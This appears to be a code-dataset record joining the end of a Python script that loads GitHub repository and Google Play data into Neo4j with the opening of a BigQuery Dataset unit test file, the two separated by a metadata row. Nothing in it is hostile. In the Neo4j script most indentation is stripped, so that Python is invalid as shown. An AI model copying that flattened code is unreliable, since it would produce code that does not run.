Node created for Google Play page if JSON file exists, otherwise None.
"""
google_play_info = parse_google_play_info(package_name, play_details_dir)
if not google_play_info:
__log__.warning('Cannot create GooglePlayPage node %s.', package_name)
return None
__log__.info('Create GooglePlayPage node for %s.', package_name)
return neo4j.create_node('GooglePlayPage', **google_play_info)
def format_repository_data(meta_data: dict, snapshot: dict) -> dict:
"""Format repository data for insertion into Neo4j.
:param dict meta_data:
        Meta data of the GitHub repository, as read from the repository list CSV.
:param dict snapshot:
Information about Gitlab project that hosts snapshot of the repository.
:returns dict:
A dictionary of properties of the node to create.
"""
if snapshot.get('created_at'):
timestamp = parse_iso8601(snapshot.get('created_at'))
else:
timestamp = None
return {
'id': meta_data['id'],
'owner': meta_data['owner_login'],
'name': meta_data['name'],
'snapshot': snapshot.get('web_url'),
'snapshotTimestamp': timestamp,
'description': meta_data['description'],
'createdAt': meta_data['created_at'],
'forksCount': meta_data['forks_count'],
'stargazersCount': meta_data['stargazers_count'],
'subscribersCount': meta_data['subscribers_count'],
'watchersCount': meta_data['watchers_count'],
'networkCount': meta_data['network_count'],
'ownerType': meta_data['owner_type'],
'parentId': meta_data['parent_id'],
'sourceId': meta_data['source_id']
}
def add_fork_relationships(neo4j: Neo4j):
"""Add FORK_OF relationships between existing GitHubRepository entities.
:param Neo4j neo4j:
Neo4j instance to add nodes to.
"""
query = '''
MATCH (fork:GitHubRepository), (parent:GitHubRepository)
WHERE fork.parentId = parent.id OR fork.sourceId = parent.id
CREATE (fork)-[:FORKS]->(parent)
'''
neo4j.run(query)
def add_repository_node(
meta_data: dict, snapshots: List[dict], neo4j: Neo4j) -> Node:
"""Add a repository and link it to all apps imnplemented by it.
Does not do anything if packages_names is empty or no :App node exists
with a matching package name.
:param dict meta_data:
        Meta data of the GitHub repository, as read from the repository list CSV.
:param List[Dict[str, str]] snapshots:
List of snapshots data. Must be length 1.
:param Neo4j neo4j:
Neo4j instance to add nodes to.
:returns Node:
The node created for the repository.
"""
snapshot = snapshots[0] if snapshots else {}
repo_data = format_repository_data(meta_data, snapshot)
query = '''
CREATE (repo:GitHubRepository {repo_properties})
RETURN repo
'''
result = neo4j.run(query, repo_properties=repo_data)
return result.single()[0]
def add_tag_nodes(tags: List[dict], repo_node_id: int, neo4j: Neo4j):
"""Create nodes representing GIT tags of a repository.
Creates a node for each tag and links it with the repository identified
by repo_node_id and the commit the tag points to.
:param List[Dict[str, str]] tags:
List of tag data.
:param int repo_node_id:
ID of node the tags should be linked to.
:param Neo4j neo4j:
Neo4j instance to add nodes to.
"""
for tag in tags:
parameters = {
'commit_hash': tag.get('commit_hash'),
'repo_id': repo_node_id,
'tag_details': {
'name': tag.get('tag_name'),
'message': tag.get('tag_message'),
},
}
neo4j.run(
'''
MATCH (repo:GitHubRepository) WHERE id(repo) = {repo_id}
MERGE (commit:Commit {id: {commit_hash}})
CREATE
(tag:Tag {tag_details})-[:BELONGS_TO]->(repo),
(tag)-[:POINTS_TO]->(commit)
''', **parameters)
def add_branche_nodes(branches: List[dict], repo_node_id: int, neo4j: Neo4j):
"""Create nodes representing GIT branches of a repository.
Creates a node for each branch and links it with the repository identified
by repo_node_id and the commit the branch points to.
:param List[Dict[str, str]] branches:
List of information on branches.
:param int repo_node_id:
ID of node the branches should be linked to.
:param Neo4j neo4j:
Neo4j instance to add nodes to.
"""
for branch in branches:
parameters = {
'commit_hash': branch.get('commit_hash'),
'repo_id': repo_node_id,
'branch_details': {
'name': branch.get('branch_name'),
},
}
neo4j.run(
'''
MATCH (repo:GitHubRepository) WHERE id(repo) = {repo_id}
MERGE (commit:Commit {id: {commit_hash}})
CREATE
(branch:Branch {branch_details})-[:BELONGS_TO]->(repo),
(branch)-[:POINTS_TO]->(commit)
''', **parameters)
def add_commit_nodes(commits: List[dict], repo_node_id: int, neo4j: Neo4j):
"""Create nodes representing GIT commits of a repository.
Creates a node for each commit and links it with the repository identified
by repo_node_id.
Also creates relationships to author, committer and parent commits. Creates
each of these in turn unless they exist already.
:param List[Dict[str, str]] commits:
List of data of commits.
:param int repo_node_id:
ID of node the commits should be linked to.
:param Neo4j neo4j:
Neo4j instance to add nodes to.
"""
for commit in commits:
parameters = {
'repo_id': repo_node_id,
'commit': {
'id': commit.get('id'),
'short_id': commit.get('short_id'),
'title': commit.get('title'),
'message': commit.get('message'),
'additions': commit.get('additions'),
'deletions': commit.get('deletions'),
'total': commit.get('total'),
},
'author': {
'email': commit.get('author_email'),
'name': commit.get('author_name'),
},
'committer': {
'email': commit.get('committer_email'),
'name': commit.get('committer_name'),
},
'authored_date': commit.get('authored_date'),
'committed_date': commit.get('committed_date'),
}
neo4j.run(
'''
MATCH (repo:GitHubRepository) WHERE id(repo) = {repo_id}
MERGE (commit:Commit {id: {commit}.id})
ON CREATE SET commit = {commit}
ON MATCH SET commit += {commit}
MERGE (author:Contributor {email: {author}.email})
ON CREATE SET author = {author}
ON MATCH SET author += {author}
MERGE (committer:Contributor {email: {committer}.email})
ON CREATE SET committer = {committer}
ON MATCH SET committer += {committer}
CREATE
(commit)-[:BELONGS_TO]->(repo),
(author)-[:AUTHORS {timestamp: {authored_date}}]->(commit),
(committer)-[:COMMITS {timestamp: {committed_date}}]->(commit)
''', **parameters)
for parent in commit.get('parent_ids').split(','):
neo4j.run(
'''
MATCH (c:Commit {id: {child}})
MERGE (p:Commit {id: {parent}})
CREATE (c)-[:PARENT]->(p)
''', parent=parent, child=commit.get('id'))
__log__.debug('Created commit %s', parameters['commit']['id'])
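# Note (added): the fields consumed from each commits.csv row above are id,
# short_id, title, message, additions, deletions, total, author_email,
# author_name, committer_email, committer_name, authored_date, committed_date
# and a comma-separated parent_ids field; missing columns simply yield None.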
def add_paths_property(
properties: dict, repo_node_id: int, package_name: str, neo4j: Neo4j):
"""Add path names as properties based on search.
    Search a git repository and add file names which contain matches to an
    :IMPLEMENTED_BY relationship matched against package_name and repo_node_id.
:param dict properties:
        Mapping of property name to property values to be added to the
relationship.
:param int repo_node_id:
Identifier for :GitHubRepository node which the :IMPLEMENTED_BY
relationship points to.
:param str package_name:
Package name of :App node.
:param Neo4j neo4j:
Neo4j instance to add nodes to.
"""
parameters = {
'package': package_name,
'repo_id': repo_node_id,
'rel_properties': properties,
}
query = '''
MATCH
(a:App {id: {package}}), (repo:GitHubRepository)
WHERE id(repo) = {repo_id}
MERGE (a)-[r:IMPLEMENTED_BY]->(repo)
ON CREATE SET r = {rel_properties}
ON MATCH SET r += {rel_properties}
'''
neo4j.run(query, **parameters)
def add_implementation_properties(
properties: List[dict], repo_node_id: int, packages: List[str],
neo4j: Neo4j):
"""Add properties to IMPLEMENTED_BY relationship.
Find Android manifest files and build system files for app in the
repository and add their paths as properties to the IMPLEMENTED_BY
relationship.
:param List[Dict[str, str]] properties:
A list of dictionaries. Each has a key 'package' and other keys that
need to be added to a relation with that package.
:param int repo_node_id:
ID of node representing the repository.
:param List[str] packages:
A list of package names to be connected with the repository identified
by repo_node_id.
:param Neo4j neo4j:
Neo4j instance to add nodes to.
"""
if {pp['package'] for pp in properties} != set(packages):
__log__.error(
'Packages stored with paths do not match. '
'Original: %s. Properties: %s', packages, properties)
# Create empty IMPLEMENTED_BY relations to make sure all packages are
# connected.
for package in packages:
add_paths_property({}, repo_node_id, package, neo4j)
for attr in properties:
package = attr['package']
del attr['package']
add_paths_property(attr, repo_node_id, package, neo4j)
def read_csv(prefix: str, filename: str) -> List[Dict[str, str]]:
"""List of all rows of a CSV file as dictionaries.
:param str prefix:
Directory of CSV file.
:param str filename:
Filename of CSV file.
:returns List[Dict[str, str]]:
List of rows of CSV file as dictionaries.
"""
path = os.path.join(prefix, filename)
with open(path) as csv_file:
csv_reader = csv.DictReader(csv_file)
return list(csv_reader)
def add_repository_info(
csv_file: IO[str], play_details_dir: str, neo4j: Neo4j,
repo_details_dir: str):
"""Add data of GIT repositories to Neo4j.
:param IO[str] csv_file:
CSV file containing meta data of repositories.
:param str play_details_dir:
Name of directory to include JSON files from. Filenames in this
directory need to have .json extension. Filename without extension is
assumed to be package name for details contained in file.
:param Neo4j neo4j:
Neo4j instance to add nodes to.
:param str repo_details_dir:
Path in which CSV files with repository details, such as commits,
branches, etc are stored.
"""
csv_reader = csv.DictReader(csv_file)
for row in csv_reader:
__log__.info('Create repo info: %s', (
row['id'], row['full_name'],
row['clone_project_id'], row['clone_project_path']))
packages = row['packages'].split(',')
__log__.info('Found packages: %s', packages)
add_app_data(packages, play_details_dir, neo4j)
path = os.path.join(repo_details_dir, row['id'])
snapshots = read_csv(path, 'snapshot.csv')
node = add_repository_node(row, snapshots, neo4j)
__log__.info('Created :GitHubRepository node with id %d', node.id)
add_commit_nodes(read_csv(path, 'commits.csv'), node.id, neo4j)
__log__.info('Created :Commit nodes')
add_branche_nodes(read_csv(path, 'branches.csv'), node.id, neo4j)
__log__.info('Created :Branch nodes')
add_tag_nodes(read_csv(path, 'tags.csv'), node.id, neo4j)
__log__.info('Created :Tag nodes')
add_implementation_properties(
read_csv(path, 'paths.csv'), node.id, packages, neo4j)
add_fork_relationships(neo4j)
def add_app_data(packages: List[str], play_details_dir: str, neo4j: Neo4j):
"""Create nodes and relationships for Android apps.
:param List[str] packages:
List of package names to create :App and :GooglePlayPage nodes for.
:param str play_details_dir:
Name of directory to include JSON files from. Filenames in this
directory need to have .json extension. Filename without extension is
assumed to be package name for details contained in file.
:param Neo4j neo4j:
Neo4j instance to add nodes to.
"""
for package in packages:
__log__.info(
'Add :GooglePlayPage and :App nodes for package: %s', package)
add_google_play_page_node(package, neo4j, play_details_dir)
neo4j.run(
'''MERGE (g:GooglePlayPage {docId: {package}})
CREATE (a:App {id: {package}})-[:PUBLISHED_AT]->(g)''',
package=package)
def define_cmdline_arguments(parser: argparse.ArgumentParser):
"""Add arguments to parser."""
parser.add_argument(
'PLAY_STORE_DETAILS_DIR', type=str,
help='Directory containing JSON files with details from Google Play.')
parser.add_argument(
'REPO_DETAILS_DIR', type=str,
help='Directory containing CSV files with details from repositories.')
parser.add_argument(
'REPOSITORY_LIST', type=argparse.FileType('r'),
help='''CSV file that lists meta data for repositories and their
snapshots on Gitlab.''')
parser.add_argument(
'--neo4j-host', type=str, default=NEO4J_HOST,
help='''Hostname Neo4j instance is running on. Default:
{}'''.format(NEO4J_HOST))
parser.add_argument(
'--neo4j-port', type=int, default=NEO4J_PORT,
help='Port number of Neo4j instance. Default: {}'.format(NEO4J_PORT))
parser.set_defaults(func=_main)
def _main(args: argparse.Namespace):
"""Pass arguments to respective function."""
__log__.info('------- Arguments: -------')
__log__.info('PLAY_STORE_DETAILS_DIR: %s', args.PLAY_STORE_DETAILS_DIR)
__log__.info('REPO_DETAILS_DIR: %s', args.REPO_DETAILS_DIR)
__log__.info('REPOSITORY_LIST: %s', args.REPOSITORY_LIST.name)
__log__.info('--neo4j-host: %s', args.neo4j_host)
__log__.info('--neo4j-port: %d', args.neo4j_port)
__log__.info('------- Arguments end -------')
neo4j_user = os.getenv('NEO4J_USER')
__log__.info('Use `%s` to login to Neo4j', neo4j_user)
neo4j_password = os.getenv('NEO4J_PASSWORD')
__log__.info('Read Neo4j password from environment')
    with Neo4j(args.neo4j_host, neo4j_user, neo4j_password, args.neo4j_port) as neo4j:
add_repository_info(
args.REPOSITORY_LIST, args.PLAY_STORE_DETAILS_DIR, neo4j,
args.REPO_DETAILS_DIR)
| 37.080178
| 79
| 0.628026
|
d9b85cf5fad368c6fe56781b521ae8b78ab70966
| 31,119
|
py
|
Python
|
bigquery/unit_tests/test_dataset.py
|
omaray/gcloud-python
|
87a13aaa140842111df2f76529a1b9ce4b6d28a6
|
[
"Apache-2.0"
] | null | null | null |
bigquery/unit_tests/test_dataset.py
|
omaray/gcloud-python
|
87a13aaa140842111df2f76529a1b9ce4b6d28a6
|
[
"Apache-2.0"
] | null | null | null |
bigquery/unit_tests/test_dataset.py
|
omaray/gcloud-python
|
87a13aaa140842111df2f76529a1b9ce4b6d28a6
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
class TestAccessGrant(unittest.TestCase):
def _getTargetClass(self):
from google.cloud.bigquery.dataset import AccessGrant
return AccessGrant
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test_ctor_defaults(self):
grant = self._makeOne('OWNER', 'userByEmail', 'phred@example.com')
self.assertEqual(grant.role, 'OWNER')
self.assertEqual(grant.entity_type, 'userByEmail')
self.assertEqual(grant.entity_id, 'phred@example.com')
def test_ctor_bad_entity_type(self):
with self.assertRaises(ValueError):
self._makeOne(None, 'unknown', None)
def test_ctor_view_with_role(self):
role = 'READER'
entity_type = 'view'
with self.assertRaises(ValueError):
self._makeOne(role, entity_type, None)
def test_ctor_view_success(self):
role = None
entity_type = 'view'
entity_id = object()
grant = self._makeOne(role, entity_type, entity_id)
self.assertEqual(grant.role, role)
self.assertEqual(grant.entity_type, entity_type)
self.assertEqual(grant.entity_id, entity_id)
def test_ctor_nonview_without_role(self):
role = None
entity_type = 'userByEmail'
with self.assertRaises(ValueError):
self._makeOne(role, entity_type, None)
def test___eq___role_mismatch(self):
grant = self._makeOne('OWNER', 'userByEmail', 'phred@example.com')
other = self._makeOne('WRITER', 'userByEmail', 'phred@example.com')
self.assertNotEqual(grant, other)
def test___eq___entity_type_mismatch(self):
grant = self._makeOne('OWNER', 'userByEmail', 'phred@example.com')
other = self._makeOne('OWNER', 'groupByEmail', 'phred@example.com')
self.assertNotEqual(grant, other)
def test___eq___entity_id_mismatch(self):
grant = self._makeOne('OWNER', 'userByEmail', 'phred@example.com')
other = self._makeOne('OWNER', 'userByEmail', 'bharney@example.com')
self.assertNotEqual(grant, other)
def test___eq___hit(self):
grant = self._makeOne('OWNER', 'userByEmail', 'phred@example.com')
other = self._makeOne('OWNER', 'userByEmail', 'phred@example.com')
self.assertEqual(grant, other)
class TestDataset(unittest.TestCase):
PROJECT = 'project'
DS_NAME = 'dataset-name'
def _getTargetClass(self):
from google.cloud.bigquery.dataset import Dataset
return Dataset
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def _setUpConstants(self):
import datetime
from google.cloud._helpers import UTC
self.WHEN_TS = 1437767599.006
self.WHEN = datetime.datetime.utcfromtimestamp(self.WHEN_TS).replace(
tzinfo=UTC)
self.ETAG = 'ETAG'
self.DS_ID = '%s:%s' % (self.PROJECT, self.DS_NAME)
self.RESOURCE_URL = 'http://example.com/path/to/resource'
def _makeResource(self):
self._setUpConstants()
USER_EMAIL = 'phred@example.com'
GROUP_EMAIL = 'group-name@lists.example.com'
return {
'creationTime': self.WHEN_TS * 1000,
'datasetReference':
{'projectId': self.PROJECT, 'datasetId': self.DS_NAME},
'etag': self.ETAG,
'id': self.DS_ID,
'lastModifiedTime': self.WHEN_TS * 1000,
'location': 'US',
'selfLink': self.RESOURCE_URL,
'access': [
{'role': 'OWNER', 'userByEmail': USER_EMAIL},
{'role': 'OWNER', 'groupByEmail': GROUP_EMAIL},
{'role': 'WRITER', 'specialGroup': 'projectWriters'},
{'role': 'READER', 'specialGroup': 'projectReaders'}],
}
def _verifyAccessGrants(self, access_grants, resource):
r_grants = []
for r_grant in resource['access']:
role = r_grant.pop('role')
for entity_type, entity_id in sorted(r_grant.items()):
r_grants.append({'role': role,
'entity_type': entity_type,
'entity_id': entity_id})
self.assertEqual(len(access_grants), len(r_grants))
for a_grant, r_grant in zip(access_grants, r_grants):
self.assertEqual(a_grant.role, r_grant['role'])
self.assertEqual(a_grant.entity_type, r_grant['entity_type'])
self.assertEqual(a_grant.entity_id, r_grant['entity_id'])
def _verifyReadonlyResourceProperties(self, dataset, resource):
self.assertEqual(dataset.dataset_id, self.DS_ID)
if 'creationTime' in resource:
self.assertEqual(dataset.created, self.WHEN)
else:
self.assertIsNone(dataset.created)
if 'etag' in resource:
self.assertEqual(dataset.etag, self.ETAG)
else:
self.assertIsNone(dataset.etag)
if 'lastModifiedTime' in resource:
self.assertEqual(dataset.modified, self.WHEN)
else:
self.assertIsNone(dataset.modified)
if 'selfLink' in resource:
self.assertEqual(dataset.self_link, self.RESOURCE_URL)
else:
self.assertIsNone(dataset.self_link)
def _verifyResourceProperties(self, dataset, resource):
self._verifyReadonlyResourceProperties(dataset, resource)
if 'defaultTableExpirationMs' in resource:
self.assertEqual(dataset.default_table_expiration_ms,
int(resource.get('defaultTableExpirationMs')))
else:
self.assertIsNone(dataset.default_table_expiration_ms)
self.assertEqual(dataset.description, resource.get('description'))
self.assertEqual(dataset.friendly_name, resource.get('friendlyName'))
self.assertEqual(dataset.location, resource.get('location'))
if 'access' in resource:
self._verifyAccessGrants(dataset.access_grants, resource)
else:
self.assertEqual(dataset.access_grants, [])
def test_ctor(self):
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client)
self.assertEqual(dataset.name, self.DS_NAME)
self.assertIs(dataset._client, client)
self.assertEqual(dataset.project, client.project)
self.assertEqual(
dataset.path,
'/projects/%s/datasets/%s' % (self.PROJECT, self.DS_NAME))
self.assertEqual(dataset.access_grants, [])
self.assertIsNone(dataset.created)
self.assertIsNone(dataset.dataset_id)
self.assertIsNone(dataset.etag)
self.assertIsNone(dataset.modified)
self.assertIsNone(dataset.self_link)
self.assertIsNone(dataset.default_table_expiration_ms)
self.assertIsNone(dataset.description)
self.assertIsNone(dataset.friendly_name)
self.assertIsNone(dataset.location)
def test_access_roles_setter_non_list(self):
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client)
with self.assertRaises(TypeError):
dataset.access_grants = object()
def test_access_roles_setter_invalid_field(self):
from google.cloud.bigquery.dataset import AccessGrant
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client)
phred = AccessGrant('OWNER', 'userByEmail', 'phred@example.com')
with self.assertRaises(ValueError):
dataset.access_grants = [phred, object()]
def test_access_roles_setter(self):
from google.cloud.bigquery.dataset import AccessGrant
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client)
phred = AccessGrant('OWNER', 'userByEmail', 'phred@example.com')
bharney = AccessGrant('OWNER', 'userByEmail', 'bharney@example.com')
dataset.access_grants = [phred, bharney]
self.assertEqual(dataset.access_grants, [phred, bharney])
def test_default_table_expiration_ms_setter_bad_value(self):
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client)
with self.assertRaises(ValueError):
dataset.default_table_expiration_ms = 'bogus'
def test_default_table_expiration_ms_setter(self):
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client)
dataset.default_table_expiration_ms = 12345
self.assertEqual(dataset.default_table_expiration_ms, 12345)
def test_description_setter_bad_value(self):
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client)
with self.assertRaises(ValueError):
dataset.description = 12345
def test_description_setter(self):
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client)
dataset.description = 'DESCRIPTION'
self.assertEqual(dataset.description, 'DESCRIPTION')
def test_friendly_name_setter_bad_value(self):
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client)
with self.assertRaises(ValueError):
dataset.friendly_name = 12345
def test_friendly_name_setter(self):
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client)
dataset.friendly_name = 'FRIENDLY'
self.assertEqual(dataset.friendly_name, 'FRIENDLY')
def test_location_setter_bad_value(self):
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client)
with self.assertRaises(ValueError):
dataset.location = 12345
def test_location_setter(self):
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client)
dataset.location = 'LOCATION'
self.assertEqual(dataset.location, 'LOCATION')
def test_from_api_repr_missing_identity(self):
self._setUpConstants()
client = _Client(self.PROJECT)
RESOURCE = {}
klass = self._getTargetClass()
with self.assertRaises(KeyError):
klass.from_api_repr(RESOURCE, client=client)
def test_from_api_repr_bare(self):
self._setUpConstants()
client = _Client(self.PROJECT)
RESOURCE = {
'id': '%s:%s' % (self.PROJECT, self.DS_NAME),
'datasetReference': {
'projectId': self.PROJECT,
'datasetId': self.DS_NAME,
}
}
klass = self._getTargetClass()
dataset = klass.from_api_repr(RESOURCE, client=client)
self.assertIs(dataset._client, client)
self._verifyResourceProperties(dataset, RESOURCE)
def test_from_api_repr_w_properties(self):
client = _Client(self.PROJECT)
RESOURCE = self._makeResource()
klass = self._getTargetClass()
dataset = klass.from_api_repr(RESOURCE, client=client)
self.assertIs(dataset._client, client)
self._verifyResourceProperties(dataset, RESOURCE)
def test__parse_access_grants_w_unknown_entity_type(self):
ACCESS = [
{'role': 'READER', 'unknown': 'UNKNOWN'},
]
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client=client)
with self.assertRaises(ValueError):
dataset._parse_access_grants(ACCESS)
def test__parse_access_grants_w_extra_keys(self):
USER_EMAIL = 'phred@example.com'
ACCESS = [
{
'role': 'READER',
'specialGroup': 'projectReaders',
'userByEmail': USER_EMAIL,
},
]
client = _Client(self.PROJECT)
dataset = self._makeOne(self.DS_NAME, client=client)
with self.assertRaises(ValueError):
dataset._parse_access_grants(ACCESS)
def test_create_w_bound_client(self):
PATH = 'projects/%s/datasets' % self.PROJECT
RESOURCE = self._makeResource()
conn = _Connection(RESOURCE)
client = _Client(project=self.PROJECT, connection=conn)
dataset = self._makeOne(self.DS_NAME, client=client)
dataset.create()
self.assertEqual(len(conn._requested), 1)
req = conn._requested[0]
self.assertEqual(req['method'], 'POST')
self.assertEqual(req['path'], '/%s' % PATH)
SENT = {
'datasetReference':
{'projectId': self.PROJECT, 'datasetId': self.DS_NAME},
}
self.assertEqual(req['data'], SENT)
self._verifyResourceProperties(dataset, RESOURCE)
def test_create_w_alternate_client(self):
from google.cloud.bigquery.dataset import AccessGrant
PATH = 'projects/%s/datasets' % self.PROJECT
USER_EMAIL = 'phred@example.com'
GROUP_EMAIL = 'group-name@lists.example.com'
DESCRIPTION = 'DESCRIPTION'
TITLE = 'TITLE'
RESOURCE = self._makeResource()
RESOURCE['description'] = DESCRIPTION
RESOURCE['friendlyName'] = TITLE
conn1 = _Connection()
CLIENT1 = _Client(project=self.PROJECT, connection=conn1)
conn2 = _Connection(RESOURCE)
CLIENT2 = _Client(project=self.PROJECT, connection=conn2)
dataset = self._makeOne(self.DS_NAME, client=CLIENT1)
dataset.friendly_name = TITLE
dataset.description = DESCRIPTION
VIEW = {
'projectId': 'my-proj',
'datasetId': 'starry-skies',
'tableId': 'northern-hemisphere',
}
dataset.access_grants = [
AccessGrant('OWNER', 'userByEmail', USER_EMAIL),
AccessGrant('OWNER', 'groupByEmail', GROUP_EMAIL),
AccessGrant('READER', 'domain', 'foo.com'),
AccessGrant('READER', 'specialGroup', 'projectReaders'),
AccessGrant('WRITER', 'specialGroup', 'projectWriters'),
AccessGrant(None, 'view', VIEW),
]
dataset.create(client=CLIENT2)
self.assertEqual(len(conn1._requested), 0)
self.assertEqual(len(conn2._requested), 1)
req = conn2._requested[0]
self.assertEqual(req['method'], 'POST')
self.assertEqual(req['path'], '/%s' % PATH)
SENT = {
'datasetReference': {
'projectId': self.PROJECT,
'datasetId': self.DS_NAME,
},
'description': DESCRIPTION,
'friendlyName': TITLE,
'access': [
{'role': 'OWNER', 'userByEmail': USER_EMAIL},
{'role': 'OWNER', 'groupByEmail': GROUP_EMAIL},
{'role': 'READER', 'domain': 'foo.com'},
{'role': 'READER', 'specialGroup': 'projectReaders'},
{'role': 'WRITER', 'specialGroup': 'projectWriters'},
{'view': VIEW},
],
}
self.assertEqual(req['data'], SENT)
self._verifyResourceProperties(dataset, RESOURCE)
def test_create_w_missing_output_properties(self):
# In the wild, the resource returned from 'dataset.create' sometimes
# lacks 'creationTime' / 'lastModifiedTime'
PATH = 'projects/%s/datasets' % (self.PROJECT,)
RESOURCE = self._makeResource()
del RESOURCE['creationTime']
del RESOURCE['lastModifiedTime']
self.WHEN = None
conn = _Connection(RESOURCE)
client = _Client(project=self.PROJECT, connection=conn)
dataset = self._makeOne(self.DS_NAME, client=client)
dataset.create()
self.assertEqual(len(conn._requested), 1)
req = conn._requested[0]
self.assertEqual(req['method'], 'POST')
self.assertEqual(req['path'], '/%s' % PATH)
SENT = {
'datasetReference':
{'projectId': self.PROJECT, 'datasetId': self.DS_NAME},
}
self.assertEqual(req['data'], SENT)
self._verifyResourceProperties(dataset, RESOURCE)
def test_exists_miss_w_bound_client(self):
PATH = 'projects/%s/datasets/%s' % (self.PROJECT, self.DS_NAME)
conn = _Connection()
client = _Client(project=self.PROJECT, connection=conn)
dataset = self._makeOne(self.DS_NAME, client=client)
self.assertFalse(dataset.exists())
self.assertEqual(len(conn._requested), 1)
req = conn._requested[0]
self.assertEqual(req['method'], 'GET')
self.assertEqual(req['path'], '/%s' % PATH)
self.assertEqual(req['query_params'], {'fields': 'id'})
def test_exists_hit_w_alternate_client(self):
PATH = 'projects/%s/datasets/%s' % (self.PROJECT, self.DS_NAME)
conn1 = _Connection()
CLIENT1 = _Client(project=self.PROJECT, connection=conn1)
conn2 = _Connection({})
CLIENT2 = _Client(project=self.PROJECT, connection=conn2)
dataset = self._makeOne(self.DS_NAME, client=CLIENT1)
self.assertTrue(dataset.exists(client=CLIENT2))
self.assertEqual(len(conn1._requested), 0)
self.assertEqual(len(conn2._requested), 1)
req = conn2._requested[0]
self.assertEqual(req['method'], 'GET')
self.assertEqual(req['path'], '/%s' % PATH)
self.assertEqual(req['query_params'], {'fields': 'id'})
def test_reload_w_bound_client(self):
PATH = 'projects/%s/datasets/%s' % (self.PROJECT, self.DS_NAME)
RESOURCE = self._makeResource()
conn = _Connection(RESOURCE)
client = _Client(project=self.PROJECT, connection=conn)
dataset = self._makeOne(self.DS_NAME, client=client)
dataset.reload()
self.assertEqual(len(conn._requested), 1)
req = conn._requested[0]
self.assertEqual(req['method'], 'GET')
self.assertEqual(req['path'], '/%s' % PATH)
self._verifyResourceProperties(dataset, RESOURCE)
def test_reload_w_alternate_client(self):
PATH = 'projects/%s/datasets/%s' % (self.PROJECT, self.DS_NAME)
RESOURCE = self._makeResource()
conn1 = _Connection()
CLIENT1 = _Client(project=self.PROJECT, connection=conn1)
conn2 = _Connection(RESOURCE)
CLIENT2 = _Client(project=self.PROJECT, connection=conn2)
dataset = self._makeOne(self.DS_NAME, client=CLIENT1)
dataset.reload(client=CLIENT2)
self.assertEqual(len(conn1._requested), 0)
self.assertEqual(len(conn2._requested), 1)
req = conn2._requested[0]
self.assertEqual(req['method'], 'GET')
self.assertEqual(req['path'], '/%s' % PATH)
self._verifyResourceProperties(dataset, RESOURCE)
def test_patch_w_invalid_expiration(self):
RESOURCE = self._makeResource()
conn = _Connection(RESOURCE)
client = _Client(project=self.PROJECT, connection=conn)
dataset = self._makeOne(self.DS_NAME, client=client)
with self.assertRaises(ValueError):
dataset.patch(default_table_expiration_ms='BOGUS')
def test_patch_w_bound_client(self):
PATH = 'projects/%s/datasets/%s' % (self.PROJECT, self.DS_NAME)
DESCRIPTION = 'DESCRIPTION'
TITLE = 'TITLE'
RESOURCE = self._makeResource()
RESOURCE['description'] = DESCRIPTION
RESOURCE['friendlyName'] = TITLE
conn = _Connection(RESOURCE)
client = _Client(project=self.PROJECT, connection=conn)
dataset = self._makeOne(self.DS_NAME, client=client)
dataset.patch(description=DESCRIPTION, friendly_name=TITLE)
self.assertEqual(len(conn._requested), 1)
req = conn._requested[0]
self.assertEqual(req['method'], 'PATCH')
SENT = {
'description': DESCRIPTION,
'friendlyName': TITLE,
}
self.assertEqual(req['data'], SENT)
self.assertEqual(req['path'], '/%s' % PATH)
self._verifyResourceProperties(dataset, RESOURCE)
def test_patch_w_alternate_client(self):
PATH = 'projects/%s/datasets/%s' % (self.PROJECT, self.DS_NAME)
DEF_TABLE_EXP = 12345
LOCATION = 'EU'
RESOURCE = self._makeResource()
RESOURCE['defaultTableExpirationMs'] = str(DEF_TABLE_EXP)
RESOURCE['location'] = LOCATION
conn1 = _Connection()
CLIENT1 = _Client(project=self.PROJECT, connection=conn1)
conn2 = _Connection(RESOURCE)
CLIENT2 = _Client(project=self.PROJECT, connection=conn2)
dataset = self._makeOne(self.DS_NAME, client=CLIENT1)
dataset.patch(client=CLIENT2,
default_table_expiration_ms=DEF_TABLE_EXP,
location=LOCATION)
self.assertEqual(len(conn1._requested), 0)
self.assertEqual(len(conn2._requested), 1)
req = conn2._requested[0]
self.assertEqual(req['method'], 'PATCH')
self.assertEqual(req['path'], '/%s' % PATH)
SENT = {
'defaultTableExpirationMs': DEF_TABLE_EXP,
'location': LOCATION,
}
self.assertEqual(req['data'], SENT)
self._verifyResourceProperties(dataset, RESOURCE)
def test_update_w_bound_client(self):
PATH = 'projects/%s/datasets/%s' % (self.PROJECT, self.DS_NAME)
DESCRIPTION = 'DESCRIPTION'
TITLE = 'TITLE'
RESOURCE = self._makeResource()
RESOURCE['description'] = DESCRIPTION
RESOURCE['friendlyName'] = TITLE
conn = _Connection(RESOURCE)
client = _Client(project=self.PROJECT, connection=conn)
dataset = self._makeOne(self.DS_NAME, client=client)
dataset.description = DESCRIPTION
dataset.friendly_name = TITLE
dataset.update()
self.assertEqual(len(conn._requested), 1)
req = conn._requested[0]
self.assertEqual(req['method'], 'PUT')
SENT = {
'datasetReference':
{'projectId': self.PROJECT, 'datasetId': self.DS_NAME},
'description': DESCRIPTION,
